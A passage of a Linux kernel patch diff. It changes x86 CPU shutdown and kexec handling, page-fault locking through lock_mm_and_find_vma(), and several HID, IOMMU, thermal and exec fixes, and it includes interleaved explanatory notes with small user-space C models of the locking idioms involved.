+ #include <linux/cpu.h>
+ #include <linux/gfp.h>
++#include <linux/kexec.h>
+ 
+ #include <asm/mtrr.h>
+ #include <asm/tlbflush.h>
+ #include <asm/mmu_context.h>
+ #include <asm/proto.h>
+ #include <asm/apic.h>
++#include <asm/cpu.h>
+ #include <asm/idtentry.h>
+ #include <asm/nmi.h>
+ #include <asm/mce.h>
+@@ -146,34 +148,47 @@ static int register_stop_handler(void)
+ 
+ static void native_stop_other_cpus(int wait)
+ {
+-	unsigned long flags;
+-	unsigned long timeout;
++	unsigned int cpu = smp_processor_id();
++	unsigned long flags, timeout;
+ 
+ 	if (reboot_force)
+ 		return;
+ 
+-	/*
+-	 * Use an own vector here because smp_call_function
+-	 * does lots of things not suitable in a panic situation.
+-	 */
++	/* Only proceed if this is the first CPU to reach this code */
++	if (atomic_cmpxchg(&stopping_cpu, -1, cpu) != -1)
++		return;
++
++	/* For kexec, ensure that offline CPUs are out of MWAIT and in HLT */
++	if (kexec_in_progress)
++		smp_kick_mwait_play_dead();
+ 
+ 	/*
+-	 * We start by using the REBOOT_VECTOR irq.
+-	 * The irq is treated as a sync point to allow critical
+-	 * regions of code on other cpus to release their spin locks
+-	 * and re-enable irqs.  Jumping straight to an NMI might
+-	 * accidentally cause deadlocks with further shutdown/panic
+-	 * code.  By syncing, we give the cpus up to one second to
+-	 * finish their work before we force them off with the NMI.
++	 * 1) Send an IPI on the reboot vector to all other CPUs.
++	 *
++	 *    The other CPUs should react on it after leaving critical
++	 *    sections and re-enabling interrupts. They might still hold
++	 *    locks, but there is nothing which can be done about that.
++	 *
++	 * 2) Wait for all other CPUs to report that they reached the
++	 *    HLT loop in stop_this_cpu()
++	 *
++	 * 3) If #2 timed out send an NMI to the CPUs which did not
++	 *    yet report
++	 *
++	 * 4) Wait for all other CPUs to report that they reached the
++	 *    HLT loop in stop_this_cpu()
++	 *
++	 * #3 can obviously race against a CPU reaching the HLT loop late.
++	 * That CPU will have reported already and the "have all CPUs
++	 * reached HLT" condition will be true despite the fact that the
++	 * other CPU is still handling the NMI. Again, there is no
++	 * protection against that as "disabled" APICs still respond to
++	 * NMIs.
+ 	 */
+-	if (num_online_cpus() > 1) {
+-		/* did someone beat us here? */
+-		if (atomic_cmpxchg(&stopping_cpu, -1, safe_smp_processor_id()) != -1)
+-			return;
+-
+-		/* sync above data before sending IRQ */
+-		wmb();
++	cpumask_copy(&cpus_stop_mask, cpu_online_mask);
++	cpumask_clear_cpu(cpu, &cpus_stop_mask);
+ 
++	if (!cpumask_empty(&cpus_stop_mask)) {
+ 		apic_send_IPI_allbutself(REBOOT_VECTOR);
+ 
+ 		/*
+@@ -183,24 +198,22 @@ static void native_stop_other_cpus(int wait)
+ 		 * CPUs reach shutdown state.
+ 		 */
+ 		timeout = USEC_PER_SEC;
+-		while (num_online_cpus() > 1 && timeout--)
++		while (!cpumask_empty(&cpus_stop_mask) && timeout--)
+ 			udelay(1);
+ 	}
+ 
+ 	/* if the REBOOT_VECTOR didn't work, try with the NMI */
+-	if (num_online_cpus() > 1) {
++	if (!cpumask_empty(&cpus_stop_mask)) {
+ 		/*
+ 		 * If NMI IPI is enabled, try to register the stop handler
+ 		 * and send the IPI. In any case try to wait for the other
+ 		 * CPUs to stop.
+ 		 */
+ 		if (!smp_no_nmi_ipi && !register_stop_handler()) {
+-			/* Sync above data before sending IRQ */
+-			wmb();
+-
+ 			pr_emerg("Shutting down cpus with NMI\n");
+ 
+-			apic_send_IPI_allbutself(NMI_VECTOR);
++			for_each_cpu(cpu, &cpus_stop_mask)
++				apic->send_IPI(cpu, NMI_VECTOR);
+ 		}
+ 		/*
+ 		 * Don't wait longer than 10 ms if the caller didn't
+@@ -208,7 +221,7 @@ static void native_stop_other_cpus(int wait)
+ 		 * one or more CPUs do not reach shutdown state.
+ 		 */
+ 		timeout = USEC_PER_MSEC * 10;
+-		while (num_online_cpus() > 1 && (wait || timeout--))
++		while (!cpumask_empty(&cpus_stop_mask) && (wait || timeout--))
+ 			udelay(1);
+ 	}
+ 
+@@ -216,6 +229,12 @@ static void native_stop_other_cpus(int wait)
+ 	disable_local_APIC();
+ 	mcheck_cpu_clear(this_cpu_ptr(&cpu_info));
+ 	local_irq_restore(flags);
++
++	/*
++	 * Ensure that the cpus_stop_mask cache lines are invalidated on
++	 * the other CPUs. See comment vs. SME in stop_this_cpu().
++	 */
++	cpumask_clear(&cpus_stop_mask);
+ }
+ 
+ /*
+diff --git a/arch/x86/kernel/smpboot.c b/arch/x86/kernel/smpboot.c
+index 3f3ea0287f694..f32ee967414e6 100644
+--- a/arch/x86/kernel/smpboot.c
++++ b/arch/x86/kernel/smpboot.c
+@@ -53,6 +53,7 @@
+ #include <linux/tboot.h>
+ #include <linux/gfp.h>
+ #include <linux/cpuidle.h>
++#include <linux/kexec.h>
+ #include <linux/numa.h>
+ #include <linux/pgtable.h>
+ #include <linux/overflow.h>
+@@ -99,6 +100,20 @@ EXPORT_PER_CPU_SYMBOL(cpu_die_map);
+ DEFINE_PER_CPU_READ_MOSTLY(struct cpuinfo_x86, cpu_info);
+ EXPORT_PER_CPU_SYMBOL(cpu_info);
+ 
++struct mwait_cpu_dead {
++	unsigned int	control;
++	unsigned int	status;
++};
++
++#define CPUDEAD_MWAIT_WAIT	0xDEADBEEF
++#define CPUDEAD_MWAIT_KEXEC_HLT	0x4A17DEAD
++
++/*
++ * Cache line aligned data for mwait_play_dead(). Separate on purpose so
++ * that it's unlikely to be touched by other CPUs.
++ */
++static DEFINE_PER_CPU_ALIGNED(struct mwait_cpu_dead, mwait_cpu_dead);
++
+ /* Logical package management. We might want to allocate that dynamically */
+ unsigned int __max_logical_packages __read_mostly;
+ EXPORT_SYMBOL(__max_logical_packages);
+@@ -155,6 +170,10 @@ static void smp_callin(void)
+ {
+ 	int cpuid;
+ 
++	/* Mop up eventual mwait_play_dead() wreckage */
++	this_cpu_write(mwait_cpu_dead.status, 0);
++	this_cpu_write(mwait_cpu_dead.control, 0);
++
+ 	/*
+ 	 * If waken up by an INIT in an 82489DX configuration
+ 	 * cpu_callout_mask guarantees we don't get here before
+@@ -1746,10 +1765,10 @@ EXPORT_SYMBOL_GPL(cond_wakeup_cpu0);
+  */
+ static inline void mwait_play_dead(void)
+ {
++	struct mwait_cpu_dead *md = this_cpu_ptr(&mwait_cpu_dead);
+ 	unsigned int eax, ebx, ecx, edx;
+ 	unsigned int highest_cstate = 0;
+ 	unsigned int highest_subcstate = 0;
+-	void *mwait_ptr;
+ 	int i;
+ 
+ 	if (boot_cpu_data.x86_vendor == X86_VENDOR_AMD ||
+@@ -1784,12 +1803,9 @@ static inline void mwait_play_dead(void)
+ 			(highest_subcstate - 1);
+ 	}
+ 
+-	/*
+-	 * This should be a memory location in a cache line which is
+-	 * unlikely to be touched by other processors.  The actual
+-	 * content is immaterial as it is not actually modified in any way.
+-	 */
+-	mwait_ptr = &current_thread_info()->flags;
++	/* Set up state for the kexec() hack below */
++	md->status = CPUDEAD_MWAIT_WAIT;
++	md->control = CPUDEAD_MWAIT_WAIT;
+ 
+ 	wbinvd();
+ 
+@@ -1802,16 +1818,63 @@ static inline void mwait_play_dead(void)
+ 		 * case where we return around the loop.
+ 		 */
+ 		mb();
+-		clflush(mwait_ptr);
++		clflush(md);
+ 		mb();
+-		__monitor(mwait_ptr, 0, 0);
++		__monitor(md, 0, 0);
+ 		mb();
+ 		__mwait(eax, 0);
+ 
++		if (READ_ONCE(md->control) == CPUDEAD_MWAIT_KEXEC_HLT) {
++			/*
++			 * Kexec is about to happen. Don't go back into mwait() as
++			 * the kexec kernel might overwrite text and data including
++			 * page tables and stack. So mwait() would resume when the
++			 * monitor cache line is written to and then the CPU goes
++			 * south due to overwritten text, page tables and stack.
++			 *
++			 * Note: This does _NOT_ protect against a stray MCE, NMI,
++			 * SMI. They will resume execution at the instruction
++			 * following the HLT instruction and run into the problem
++			 * which this is trying to prevent.
++			 */
++			WRITE_ONCE(md->status, CPUDEAD_MWAIT_KEXEC_HLT);
++			while(1)
++				native_halt();
++		}
++
+ 		cond_wakeup_cpu0();
+ 	}
+ }
+ 
++/*
++ * Kick all "offline" CPUs out of mwait on kexec(). See comment in
++ * mwait_play_dead().
++ */
++void smp_kick_mwait_play_dead(void)
++{
++	u32 newstate = CPUDEAD_MWAIT_KEXEC_HLT;
++	struct mwait_cpu_dead *md;
++	unsigned int cpu, i;
++
++	for_each_cpu_andnot(cpu, cpu_present_mask, cpu_online_mask) {
++		md = per_cpu_ptr(&mwait_cpu_dead, cpu);
++
++		/* Does it sit in mwait_play_dead() ? */
++		if (READ_ONCE(md->status) != CPUDEAD_MWAIT_WAIT)
++			continue;
++
++		/* Wait up to 5ms */
++		for (i = 0; READ_ONCE(md->status) != newstate && i < 1000; i++) {
++			/* Bring it out of mwait */
++			WRITE_ONCE(md->control, newstate);
++			udelay(5);
++		}
++
++		if (READ_ONCE(md->status) != newstate)
++			pr_err_once("CPU%u is stuck in mwait_play_dead()\n", cpu);
++	}
++}
++
+ void hlt_play_dead(void)
+ {
+ 	if (__this_cpu_read(cpu_info.x86) >= 4)
+diff --git a/arch/x86/mm/fault.c b/arch/x86/mm/fault.c
+index 7b0d4ab894c8b..1dbbad73192a1 100644
+--- a/arch/x86/mm/fault.c
++++ b/arch/x86/mm/fault.c
+@@ -900,12 +900,6 @@ __bad_area(struct pt_regs *regs, unsigned long error_code,
+ 	__bad_area_nosemaphore(regs, error_code, address, pkey, si_code);
+ }
+ 
+-static noinline void
+-bad_area(struct pt_regs *regs, unsigned long error_code, unsigned long address)
+-{
+-	__bad_area(regs, error_code, address, 0, SEGV_MAPERR);
+-}
+-
+ static inline bool bad_area_access_from_pkeys(unsigned long error_code,
+ 		struct vm_area_struct *vma)
+ {
+@@ -1354,51 +1348,10 @@ void do_user_addr_fault(struct pt_regs *regs,
+ 	}
+ #endif
+ 
+-	/*
+-	 * Kernel-mode access to the user address space should only occur
+-	 * on well-defined single instructions listed in the exception
+-	 * tables.  But, an erroneous kernel fault occurring outside one of
+-	 * those areas which also holds mmap_lock might deadlock attempting
+-	 * to validate the fault against the address space.
+-	 *
+-	 * Only do the expensive exception table search when we might be at
+-	 * risk of a deadlock.  This happens if we
+-	 * 1. Failed to acquire mmap_lock, and
+-	 * 2. The access did not originate in userspace.
+-	 */
+-	if (unlikely(!mmap_read_trylock(mm))) {
+-		if (!user_mode(regs) && !search_exception_tables(regs->ip)) {
+-			/*
+-			 * Fault from code in kernel from
+-			 * which we do not expect faults.
+-			 */
+-			bad_area_nosemaphore(regs, error_code, address);
+-			return;
+-		}
+ retry:
+-		mmap_read_lock(mm);
+-	} else {
+-		/*
+-		 * The above down_read_trylock() might have succeeded in
+-		 * which case we'll have missed the might_sleep() from
+-		 * down_read():
+-		 */
+-		might_sleep();
+-	}
+-
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (unlikely(!vma)) {
+-		bad_area(regs, error_code, address);
+-		return;
+-	}
+-	if (likely(vma->vm_start <= address))
+-		goto good_area;
+-	if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) {
+-		bad_area(regs, error_code, address);
+-		return;
+-	}
+-	if (unlikely(expand_stack(vma, address))) {
+-		bad_area(regs, error_code, address);
++		bad_area_nosemaphore(regs, error_code, address);
+ 		return;
+ 	}
+ 
+@@ -1406,7 +1359,6 @@ retry:
+ 	 * Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it..
+ 	 */
+-good_area:
+ 	if (unlikely(access_error(error_code, vma))) {
+ 		bad_area_access_error(regs, error_code, address, vma);
+ 		return;
+diff --git a/arch/xtensa/Kconfig b/arch/xtensa/Kconfig
+index bcb0c5d2abc2f..6d3c9257aa133 100644
+--- a/arch/xtensa/Kconfig
++++ b/arch/xtensa/Kconfig
+@@ -49,6 +49,7 @@ config XTENSA
+ 	select HAVE_SYSCALL_TRACEPOINTS
+ 	select HAVE_VIRT_CPU_ACCOUNTING_GEN
+ 	select IRQ_DOMAIN
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select PERF_USE_VMALLOC
+ 	select TRACE_IRQFLAGS_SUPPORT
+diff --git a/arch/xtensa/mm/fault.c b/arch/xtensa/mm/fault.c
+index 8c781b05c0bdd..d89b193c779f1 100644
+--- a/arch/xtensa/mm/fault.c
++++ b/arch/xtensa/mm/fault.c
+@@ -130,23 +130,14 @@ void do_page_fault(struct pt_regs *regs)
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ 
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, address);
+-
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++		goto bad_area_nosemaphore;
+ 
+ 	/* Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it..
+ 	 */
+ 
+-good_area:
+ 	code = SEGV_ACCERR;
+ 
+ 	if (is_write) {
+@@ -205,6 +196,7 @@ good_area:
+ 	 */
+ bad_area:
+ 	mmap_read_unlock(mm);
++bad_area_nosemaphore:
+ 	if (user_mode(regs)) {
+ 		current->thread.bad_vaddr = address;
+ 		current->thread.error_code = is_write;
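
The fault-handler conversions in this patch all rely on one contract: lock_mm_and_find_vma() only returns a vma with the mmap lock read-held; on failure the lock has already been dropped, which is why the error paths above now jump to the *_nosemaphore labels. A toy user-space model of that contract, assuming a pthread rwlock and an invented find helper:

/* Toy model of the lock_mm_and_find_vma() contract: on success the lookup
 * returns with the read lock held and the caller must unlock; on failure
 * the lock has already been dropped, so the error path must not unlock.
 * table/lock_and_find_entry/handle are invented stand-ins.
 */
#include <pthread.h>
#include <stdio.h>

static pthread_rwlock_t lock = PTHREAD_RWLOCK_INITIALIZER;
static int table[4] = { 10, 20, 30, 40 };

static int *lock_and_find_entry(int idx)
{
	pthread_rwlock_rdlock(&lock);
	if (idx < 0 || idx >= 4) {
		pthread_rwlock_unlock(&lock);	/* drop on failure, like the helper */
		return NULL;
	}
	return &table[idx];			/* success: still read-locked */
}

static void handle(int idx)
{
	int *e = lock_and_find_entry(idx);

	if (!e) {
		/* "bad_area_nosemaphore": no unlock on this path */
		fprintf(stderr, "no entry at %d\n", idx);
		return;
	}
	printf("entry %d = %d\n", idx, *e);
	pthread_rwlock_unlock(&lock);		/* normal path unlocks */
}

int main(void)
{
	handle(2);
	handle(9);
	return 0;
}
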
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index b2cd7527de195..0b4204b9a253c 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -4348,7 +4348,7 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	{ /* wireless touchpad T651 */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH,
+ 		USB_DEVICE_ID_LOGITECH_T651),
+-	  .driver_data = HIDPP_QUIRK_CLASS_WTP },
++	  .driver_data = HIDPP_QUIRK_CLASS_WTP | HIDPP_QUIRK_DELAYED_INIT },
+ 	{ /* Mouse Logitech Anywhere MX */
+ 	  LDJ_DEVICE(0x1017), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
+ 	{ /* Mouse logitech M560 */
+diff --git a/drivers/hid/hidraw.c b/drivers/hid/hidraw.c
+index 197b1e7bf029e..b617aada50b06 100644
+--- a/drivers/hid/hidraw.c
++++ b/drivers/hid/hidraw.c
+@@ -272,7 +272,12 @@ static int hidraw_open(struct inode *inode, struct file *file)
+ 		goto out;
+ 	}
+ 
+-	down_read(&minors_rwsem);
++	/*
++	 * Technically not writing to the hidraw_table but a write lock is
++	 * required to protect the device refcount. This is symmetrical to
++	 * hidraw_release().
++	 */
++	down_write(&minors_rwsem);
+ 	if (!hidraw_table[minor] || !hidraw_table[minor]->exist) {
+ 		err = -ENODEV;
+ 		goto out_unlock;
+@@ -301,7 +306,7 @@ static int hidraw_open(struct inode *inode, struct file *file)
+ 	spin_unlock_irqrestore(&hidraw_table[minor]->list_lock, flags);
+ 	file->private_data = list;
+ out_unlock:
+-	up_read(&minors_rwsem);
++	up_write(&minors_rwsem);
+ out:
+ 	if (err < 0)
+ 		kfree(list);
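
The hidraw change is an instance of a general rwlock rule: the read side only licenses reading the protected data, so bumping a plain, non-atomic reference count needs the write side even though the table itself is untouched. A minimal sketch with pthread rwlocks (struct dev and the open helpers are invented):

#include <pthread.h>

struct dev {
	pthread_rwlock_t lock;
	int open_count;		/* plain int: mutating it is a write */
};

/* Wrong: rdlock only excludes writers, not other readers doing the
 * same increment, so concurrent open_count updates can be lost. */
static void open_racy(struct dev *d)
{
	pthread_rwlock_rdlock(&d->lock);
	d->open_count++;
	pthread_rwlock_unlock(&d->lock);
}

/* Right: take the write side for the increment, mirroring hidraw_open()
 * after the fix (symmetrical with the release path). */
static void open_fixed(struct dev *d)
{
	pthread_rwlock_wrlock(&d->lock);
	d->open_count++;
	pthread_rwlock_unlock(&d->lock);
}

int main(void)
{
	struct dev d = { PTHREAD_RWLOCK_INITIALIZER, 0 };

	open_racy(&d);	/* fine single-threaded, unsafe concurrently */
	open_fixed(&d);
	return d.open_count == 2 ? 0 : 1;
}
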
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 9c30dd30537af..15cd0cabee2a9 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -1309,7 +1309,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 	struct input_dev *pen_input = wacom->pen_input;
+ 	unsigned char *data = wacom->data;
+ 	int number_of_valid_frames = 0;
+-	int time_interval = 15000000;
++	ktime_t time_interval = 15000000;
+ 	ktime_t time_packet_received = ktime_get();
+ 	int i;
+ 
+@@ -1343,7 +1343,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 	if (number_of_valid_frames) {
+ 		if (wacom->hid_data.time_delayed)
+ 			time_interval = ktime_get() - wacom->hid_data.time_delayed;
+-		time_interval /= number_of_valid_frames;
++		time_interval = div_u64(time_interval, number_of_valid_frames);
+ 		wacom->hid_data.time_delayed = time_packet_received;
+ 	}
+ 
+@@ -1354,7 +1354,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 		bool range = frame[0] & 0x20;
+ 		bool invert = frame[0] & 0x10;
+ 		int frames_number_reversed = number_of_valid_frames - i - 1;
+-		int event_timestamp = time_packet_received - frames_number_reversed * time_interval;
++		ktime_t event_timestamp = time_packet_received - frames_number_reversed * time_interval;
+ 
+ 		if (!valid)
+ 			continue;
+diff --git a/drivers/hid/wacom_wac.h b/drivers/hid/wacom_wac.h
+index 1a40bb8c5810c..ee21bb260f22f 100644
+--- a/drivers/hid/wacom_wac.h
++++ b/drivers/hid/wacom_wac.h
+@@ -324,7 +324,7 @@ struct hid_data {
+ 	int ps_connected;
+ 	bool pad_input_event_flag;
+ 	unsigned short sequence_number;
+-	int time_delayed;
++	ktime_t time_delayed;
+ };
+ 
+ struct wacom_remote_data {
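
Two distinct bugs are fixed in the wacom hunks: holding the 64-bit nanosecond values in int truncated them, and dividing a 64-bit dividend with plain / pulls in a libgcc helper on 32-bit arches, which the kernel sidesteps with div_u64(). A stand-alone sketch of the corrected arithmetic, with ktime_t modeled as int64_t and div_u64() as a trivial host stand-in:

#include <stdint.h>
#include <stdio.h>

typedef int64_t ktime_t;		/* nanoseconds, as in the kernel */

/* Host stand-in; the kernel's div_u64() avoids 64/32 libgcc helpers. */
static uint64_t div_u64(uint64_t dividend, uint32_t divisor)
{
	return dividend / divisor;
}

int main(void)
{
	ktime_t received = 2000000000LL;	/* packet arrived at t = 2s */
	ktime_t prev     = 1999955000LL;	/* previous packet, 45us earlier */
	int frames = 3;

	/* per-frame spacing; an int here would truncate large deltas */
	ktime_t interval = div_u64(received - prev, frames);

	for (int i = 0; i < frames; i++) {
		int reversed = frames - i - 1;
		ktime_t stamp = received - reversed * interval;

		printf("frame %d @ %lld ns\n", i, (long long)stamp);
	}
	return 0;
}
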
+diff --git a/drivers/iommu/amd/iommu_v2.c b/drivers/iommu/amd/iommu_v2.c
+index 9f7fab49a5a90..75355ddca6575 100644
+--- a/drivers/iommu/amd/iommu_v2.c
++++ b/drivers/iommu/amd/iommu_v2.c
+@@ -485,8 +485,8 @@ static void do_fault(struct work_struct *work)
+ 	flags |= FAULT_FLAG_REMOTE;
+ 
+ 	mmap_read_lock(mm);
+-	vma = find_extend_vma(mm, address);
+-	if (!vma || address < vma->vm_start)
++	vma = vma_lookup(mm, address);
++	if (!vma)
+ 		/* failed to get a vma in the right range */
+ 		goto out;
+ 
+diff --git a/drivers/iommu/io-pgfault.c b/drivers/iommu/io-pgfault.c
+index 1df8c1dcae776..16e564cb393b7 100644
+--- a/drivers/iommu/io-pgfault.c
++++ b/drivers/iommu/io-pgfault.c
+@@ -89,7 +89,7 @@ iopf_handle_single(struct iopf_fault *iopf)
+ 
+ 	mmap_read_lock(mm);
+ 
+-	vma = find_extend_vma(mm, prm->addr);
++	vma = vma_lookup(mm, prm->addr);
+ 	if (!vma)
+ 		/* Unmapped area */
+ 		goto out_put_mm;
+diff --git a/drivers/thermal/mtk_thermal.c b/drivers/thermal/mtk_thermal.c
+index 62f1e691659e3..8440692e3890d 100644
+--- a/drivers/thermal/mtk_thermal.c
++++ b/drivers/thermal/mtk_thermal.c
+@@ -1028,12 +1028,7 @@ static int mtk_thermal_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	auxadc_base = devm_of_iomap(&pdev->dev, auxadc, 0, NULL);
+-	if (IS_ERR(auxadc_base)) {
+-		of_node_put(auxadc);
+-		return PTR_ERR(auxadc_base);
+-	}
+-
++	auxadc_base = of_iomap(auxadc, 0);
+ 	auxadc_phys_base = of_get_phys_base(auxadc);
+ 
+ 	of_node_put(auxadc);
+@@ -1049,12 +1044,7 @@ static int mtk_thermal_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
+-	apmixed_base = devm_of_iomap(&pdev->dev, apmixedsys, 0, NULL);
+-	if (IS_ERR(apmixed_base)) {
+-		of_node_put(apmixedsys);
+-		return PTR_ERR(apmixed_base);
+-	}
+-
++	apmixed_base = of_iomap(apmixedsys, 0);
+ 	apmixed_phys_base = of_get_phys_base(apmixedsys);
+ 
+ 	of_node_put(apmixedsys);
+diff --git a/drivers/video/fbdev/core/sysimgblt.c b/drivers/video/fbdev/core/sysimgblt.c
+index 335e92b813fc4..665ef7a0a2495 100644
+--- a/drivers/video/fbdev/core/sysimgblt.c
++++ b/drivers/video/fbdev/core/sysimgblt.c
+@@ -189,7 +189,7 @@ static void fast_imageblit(const struct fb_image *image, struct fb_info *p,
+ 	u32 fgx = fgcolor, bgx = bgcolor, bpp = p->var.bits_per_pixel;
+ 	u32 ppw = 32/bpp, spitch = (image->width + 7)/8;
+ 	u32 bit_mask, eorx, shift;
+-	const char *s = image->data, *src;
++	const u8 *s = image->data, *src;
+ 	u32 *dst;
+ 	const u32 *tab;
+ 	size_t tablen;
+diff --git a/fs/binfmt_elf.c b/fs/binfmt_elf.c
+index 444302afc673a..e6c9c0e084486 100644
+--- a/fs/binfmt_elf.c
++++ b/fs/binfmt_elf.c
+@@ -315,10 +315,10 @@ create_elf_tables(struct linux_binprm *bprm, const struct elfhdr *exec,
+ 	 * Grow the stack manually; some architectures have a limit on how
+ 	 * far ahead a user-space access may be in order to grow the stack.
+ 	 */
+-	if (mmap_read_lock_killable(mm))
++	if (mmap_write_lock_killable(mm))
+ 		return -EINTR;
+-	vma = find_extend_vma(mm, bprm->p);
+-	mmap_read_unlock(mm);
++	vma = find_extend_vma_locked(mm, bprm->p);
++	mmap_write_unlock(mm);
+ 	if (!vma)
+ 		return -EFAULT;
+ 
+diff --git a/fs/exec.c b/fs/exec.c
+index a0b1f0337a628..283012eb1aeb9 100644
+--- a/fs/exec.c
++++ b/fs/exec.c
+@@ -198,33 +198,39 @@ static struct page *get_arg_page(struct linux_binprm *bprm, unsigned long pos,
+ 		int write)
+ {
+ 	struct page *page;
++	struct vm_area_struct *vma = bprm->vma;
++	struct mm_struct *mm = bprm->mm;
+ 	int ret;
+-	unsigned int gup_flags = FOLL_FORCE;
+ 
+-#ifdef CONFIG_STACK_GROWSUP
+-	if (write) {
+-		ret = expand_downwards(bprm->vma, pos);
+-		if (ret < 0)
++	/*
++	 * Avoid relying on expanding the stack down in GUP (which
++	 * does not work for STACK_GROWSUP anyway), and just do it
++	 * by hand ahead of time.
++	 */
++	if (write && pos < vma->vm_start) {
++		mmap_write_lock(mm);
++		ret = expand_downwards(vma, pos);
++		if (unlikely(ret < 0)) {
++			mmap_write_unlock(mm);
+ 			return NULL;
+-	}
+-#endif
+-
+-	if (write)
+-		gup_flags |= FOLL_WRITE;
++		}
++		mmap_write_downgrade(mm);
++	} else
++		mmap_read_lock(mm);
+ 
+ 	/*
+ 	 * We are doing an exec().  'current' is the process
+-	 * doing the exec and bprm->mm is the new process's mm.
++	 * doing the exec and 'mm' is the new process's mm.
+ 	 */
+-	mmap_read_lock(bprm->mm);
+-	ret = get_user_pages_remote(bprm->mm, pos, 1, gup_flags,
++	ret = get_user_pages_remote(mm, pos, 1,
++			write ? FOLL_WRITE : 0,
+ 			&page, NULL, NULL);
+-	mmap_read_unlock(bprm->mm);
++	mmap_read_unlock(mm);
+ 	if (ret <= 0)
+ 		return NULL;
+ 
+ 	if (write)
+-		acct_arg_size(bprm, vma_pages(bprm->vma));
++		acct_arg_size(bprm, vma_pages(vma));
+ 
+ 	return page;
+ }
+@@ -854,7 +860,7 @@ int setup_arg_pages(struct linux_binprm *bprm,
+ 		stack_base = vma->vm_start - stack_expand;
+ #endif
+ 	current->mm->start_stack = bprm->p;
+-	ret = expand_stack(vma, stack_base);
++	ret = expand_stack_locked(vma, stack_base);
+ 	if (ret)
+ 		ret = -EFAULT;
+ 
+diff --git a/include/linux/highmem.h b/include/linux/highmem.h
+index e9912da5441b4..44242268f53bd 100644
+--- a/include/linux/highmem.h
++++ b/include/linux/highmem.h
+@@ -319,6 +319,32 @@ static inline void copy_user_highpage(struct page *to, struct page *from,
+ 
+ #endif
+ 
++#ifdef copy_mc_to_kernel
++static inline int copy_mc_user_highpage(struct page *to, struct page *from,
++					unsigned long vaddr, struct vm_area_struct *vma)
++{
++	unsigned long ret;
++	char *vfrom, *vto;
++
++	vfrom = kmap_local_page(from);
++	vto = kmap_local_page(to);
++	ret = copy_mc_to_kernel(vto, vfrom, PAGE_SIZE);
++	if (!ret)
++		kmsan_unpoison_memory(page_address(to), PAGE_SIZE);
++	kunmap_local(vto);
++	kunmap_local(vfrom);
++
++	return ret;
++}
++#else
++static inline int copy_mc_user_highpage(struct page *to, struct page *from,
++					unsigned long vaddr, struct vm_area_struct *vma)
++{
++	copy_user_highpage(to, from, vaddr, vma);
++	return 0;
++}
++#endif
++
+ #ifndef __HAVE_ARCH_COPY_HIGHPAGE
+ 
+ static inline void copy_highpage(struct page *to, struct page *from)
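
copy_mc_user_highpage() uses a common kernel idiom: an architecture that supports machine-check-safe copies defines copy_mc_to_kernel() as a macro, so generic code can pick an implementation with a plain #ifdef on the macro name and otherwise fall back to the unchecked copy, reporting unconditional success. A toy version of the idiom (checked_copy and copy_buf are invented names):

#include <stdio.h>
#include <string.h>

/* An arch header would provide this as a macro when supported, e.g.:
 *   #define checked_copy(dst, src, len)  arch_checked_copy(dst, src, len)
 * It is left undefined here to exercise the fallback branch.
 */

#ifdef checked_copy
static int copy_buf(void *dst, const void *src, size_t len)
{
	return checked_copy(dst, src, len);	/* nonzero => poisoned source */
}
#else
static int copy_buf(void *dst, const void *src, size_t len)
{
	memcpy(dst, src, len);			/* no MC protection available */
	return 0;				/* so unconditionally "succeed" */
}
#endif

int main(void)
{
	char src[8] = "poison?", dst[8];

	if (copy_buf(dst, src, sizeof(src)))
		fprintf(stderr, "source page was poisoned\n");
	else
		printf("copied: %s\n", dst);
	return 0;
}
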
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index e5e8acf8eb895..f5b6ef943ede2 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -1921,6 +1921,9 @@ void pagecache_isize_extended(struct inode *inode, loff_t from, loff_t to);
+ void truncate_pagecache_range(struct inode *inode, loff_t offset, loff_t end);
+ int generic_error_remove_page(struct address_space *mapping, struct page *page);
+ 
++struct vm_area_struct *lock_mm_and_find_vma(struct mm_struct *mm,
++		unsigned long address, struct pt_regs *regs);
++
+ #ifdef CONFIG_MMU
+ extern vm_fault_t handle_mm_fault(struct vm_area_struct *vma,
+ 				  unsigned long address, unsigned int flags,
+@@ -2808,16 +2811,11 @@ extern vm_fault_t filemap_page_mkwrite(struct vm_fault *vmf);
+ 
+ extern unsigned long stack_guard_gap;
+ /* Generic expand stack which grows the stack according to GROWS{UP,DOWN} */
+-extern int expand_stack(struct vm_area_struct *vma, unsigned long address);
++int expand_stack_locked(struct vm_area_struct *vma, unsigned long address);
++struct vm_area_struct *expand_stack(struct mm_struct * mm, unsigned long addr);
+ 
+ /* CONFIG_STACK_GROWSUP still needs to grow downwards at some places */
+-extern int expand_downwards(struct vm_area_struct *vma,
+-		unsigned long address);
+-#if VM_GROWSUP
+-extern int expand_upwards(struct vm_area_struct *vma, unsigned long address);
+-#else
+-  #define expand_upwards(vma, address) (0)
+-#endif
++int expand_downwards(struct vm_area_struct *vma, unsigned long address);
+ 
